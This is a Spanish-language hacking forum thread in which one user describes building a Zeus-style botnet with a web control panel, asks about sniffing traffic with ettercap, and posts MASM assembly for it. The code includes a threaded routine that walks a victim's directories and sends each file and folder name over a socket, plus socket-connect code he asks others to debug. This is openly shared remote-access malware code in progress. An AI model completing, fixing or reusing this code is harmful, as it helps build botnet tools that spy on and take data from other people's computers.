Mensajes

Es el premio mayor en desarrollo de malware...

Buenas amigos!! Hoy se me antojo programar un rato en plataforma web,, y que mejor que una especie de botnet?
Bueno,, como ya sabrán algunos, la mayoría del hosting gratuito no ofrece sql remoto, ni sockets en php,, entonces pensé,, bueno, de alguna forma se tiene que poder! Si Zeus puede, yo también :p

Alguien que me pueda dar una idea de como funciona la conexión entre cliente C++ y server web?

Pd: Algunos pensaran que estoy equivocado con los términos cliente y server,, pero no se porque los suelen llamar al revés :/

Jejejeje esta bueno tambien!! Al mejor estilo abstracto jajaja Saludos!

PD: No he tenido tiempo ultimamente,, pero como dije antes,, este proyecto lo voy a terminar,, y a lo mejor, para cuando lo termine,, lo libero sin mas,, despues de todo, la idea es aprender

[EDITADO:]

Hola amigos del foro! Primero que nada, perdon si no deberia estar aca la consulta, y segundo que probablemente ya este aclarada esta misma duda en algun otro hilo, pero no lo he encontrado...
Bueno, el asunto es que necesito sniffar mi red, solamente para aprender un poco de ese asunto :p El problema es que no se si se puede hacer como yo quiero,, yo me conecto a mi red por wifi desde una notebook,, la duda es.. se puede leer los paquetes que pasan por el router hacia otra pc que se conecta con cable? O sea,, algo asi es la red:

PC1 (conectada al router por cable) -->  [ROUTER] <-- PC2 (conectada al router por wifi)

Podria la PC2 ver los paquetes de la PC1? Bueno,, eso nomas.. Si no se entiende lo trato de explicar mejor!! Gracias!! Saludos

EDITADO: Bien, leyendo un poco mas,, veo que si se puede.. con ettercap.
Puede ser que este en lo correcto? De ser asi, alguna sugerencia? Algun buen tuto para los novatos..? Gracias!

gracias por los comentarios!! Al final lo pause un poco porque ando en otro proyecto,, pero va a salir.. Saludos!!

Si amigo.. ayer estaba haciendo zapping y vi lo de la ley esa.. pero segun entiendo es en españa solo, no ? Podrias proporcionar mas informacion sobre la ley en si? Y como las autoridades piensan "infectar" a la maquina del sospechoso ? ( Bueno, eso probablemente no lo digan ) Yo calculo que deben esperar a que salgan de la casa y ahi van los "hackers del estado" a infectarte la pc.. 

Gracias cpu2! Ahora lo intentare !!

las constantes las declare para no escibir una y otra vez los valores mientras probaba como hacer funcionar esto que explicas con tanta naturalidad jajaja

por otro lado,, es verdad, aun no domino el arte de los registros y el stack...hay cosas que aun no se  pero mi experiencia dice: "Hacer y entender" ( Aunque un libro tampoco estaria mal en asm ) jajajaja Igual, juro que he leido! ( Hace 2 meses siquiera pensaba en programar en asm... )

Saludos!

Interesante... pero cada vez odio mas los builders.. al final que sentido tiene? Darle a un monton de novatos la facilidad de "crear" cosas ya creadas.. De que aprendan a programar y usen la cabeza ni hablemos.. no ?

Saludos !!

Hola.. Perdon que respondo tan tarde, recien veo que no esta mi comentario anterior.. el problema ya esta resuelto.. Pongo la solucion:

Código [Seleccionar] Expandir



SFile WIN32_FIND_DATA <> (Estructura para busqueda de archivos)
NoE db "MSG|Archivo no encontrado0", 0
EFile db "File|%s0", 0
EFold db "Fold|%s0", 0

ThreadBus proc FtoF:DWORD

invoke FindFirstFile, FtoF, addr SFile
cmp eax, -1
je NoEncontrado
mov Hand, eax

Buccle:

invoke FindNextFile, Hand, addr SFile
cmp eax, 0
je Salida

cmp SFile.cFileName, PUNTO
je Buccle

cmp SFile.dwFileAttributes, FILE_ATTRIBUTE_DIRECTORY
jne Files
;Envio las carptas
invoke wsprintf, addr Bufi, addr EFold, addr SFile.cFileName
invoke send, Sock, addr Bufi, sizeof Bufi, 0
jmp Buccle

Files:
;Envio los archivos
invoke wsprintf, addr Bufi, addr EFile, addr SFile.cFileName
invoke send, Sock, addr Bufi, sizeof Bufi, 0
jmp Buccle

Salida:
invoke FindClose, addr Hand
jmp Fin

NoEncontrado:
invoke send, Sock, addr NoE, sizeof NoE, 0

Fin:

ret
ThreadBus endp



Justo ahora lo estoy por arreglar, porque funciona bastante bien, pero no es optimo del todo :p
Esta funcion (ThreadBus) tiene que ser llamada como un thread para que funcione bien..

Saludos!

Buenas señores! Primero que nada, perdon por volver a escribir en este post, pero no daba para empezar otro hilo.. ( me parece )

Estoy teniendo problemas para hacer el push de htoons y inet..

Código [Seleccionar] Expandir


INET equ 0100007fh
HTOONS equ 0b8220200h


Y luego

Código [Seleccionar] Expandir


ThreadProc PROC

invoke WSAStartup, addr Ver, addr wsa
invoke socket, AF_INET, SOCK_STREAM, 0
mov sock, eax
invoke WSAAsyncSelect, sock, hwnd, WM_SOCK, FD_CONNECT or FD_CLOSE or FD_READ
mov sa.sin_family, AF_INET

;invoke inet_addr, addr szIp
;mov sa.sin_addr, eax
;Pusheo el valor de Inet

mov sa.sin_addr, INET
push INET

;invoke htons, port
;mov sa.sin_port, ax
;Pusheo el valor de Htoons

mov ax, HTOONS
push HTOONS

invoke connect, sock, addr sa, sizeof sa

ret
ThreadProc ENDP


El problema es que cuando lo ejecuto funciona, pero me empieza a abrir este proceso: vsjitdebugger.exe infinitas veces, hasta que supongo yo, colapse la memoria  

Que puede estar pasando ? tendira que sacar de la pila despues que pusheo ?

Gracias por leer !!